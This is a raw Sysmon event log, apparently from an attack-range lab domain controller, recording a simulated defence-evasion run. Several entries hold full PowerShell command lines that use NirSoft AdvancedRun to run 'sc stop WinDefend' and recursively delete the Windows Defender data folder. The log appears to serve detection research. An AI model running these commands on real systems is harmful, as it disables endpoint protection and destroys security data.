Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.298{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.283{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.282{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.284{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.276{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.283{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.282{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.265{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.277{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.260{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967547Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.240{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000002967542Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.240{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002967540Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.199{834264DD-0DBC-61E7-DC00-000000002402}20924344C:\Windows\system32\csrss.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002967539Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.189{834264DD-0DCB-61E7-F800-000000002402}52965668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000002967538Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.167{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\advancedrun\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002964186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:17:37.761{834264DD-DF81-61E9-DE61-000000002402}8072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\AdvancedRun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\advancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002963805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:17:32.885{834264DD-DF7C-61E9-DB61-000000002402}8040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\AdvancedRun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002962544Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:16:42.740{834264DD-DF4A-61E9-D161-000000002402}1668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002962145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:16:31.671{834264DD-DF3F-61E9-CE61-000000002402}2648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000002962137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:16:31.571{834264DD-DF3E-61E9-CD61-000000002402}5000C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe2022-01-20 22:16:31.571ATTACKRANGE\Administrator 154100x80000000000000002961227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:16:30.160{834264DD-DF3E-61E9-CC61-000000002402}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002959234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:15:21.442{834264DD-DEF9-61E9-C061-000000002402}7968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000002959226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:15:21.330{834264DD-DEF8-61E9-BF61-000000002402}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe2022-01-20 22:02:13.036ATTACKRANGE\Administrator 23542300x80000000000000002959225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:15:21.314{834264DD-DEF8-61E9-BF61-000000002402}2276ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8truetrue 154100x80000000000000002958315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:15:19.860{834264DD-DEF7-61E9-BE61-000000002402}6944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002957970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:15:16.220{834264DD-DEF4-61E9-BB61-000000002402}8132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\advancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002956502Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:14:01.965{834264DD-DEA9-61E9-AD61-000000002402}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\advancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002956089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:13:51.504{834264DD-DE9F-61E9-AA61-000000002402}7940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\x07dvancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\x07dvancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002955141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:13:05.114{834264DD-DE71-61E9-A061-000000002402}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\advancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002954401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:12:58.607{834264DD-DE6A-61E9-9D61-000000002402}4388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path $env:TEMP\advancedrun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000002944148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:02:13.036{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe2022-01-20 22:02:13.036ATTACKRANGE\Administrator 13241300x80000000000000002926120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:36.161{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe\REGISTRY\A\{3b53e57c-2a0c-3c13-3fd7-468e6d87b206}\Root\InventoryApplicationFile\advancedrun.exe|da2ad31d568bac4\UsnQWORD 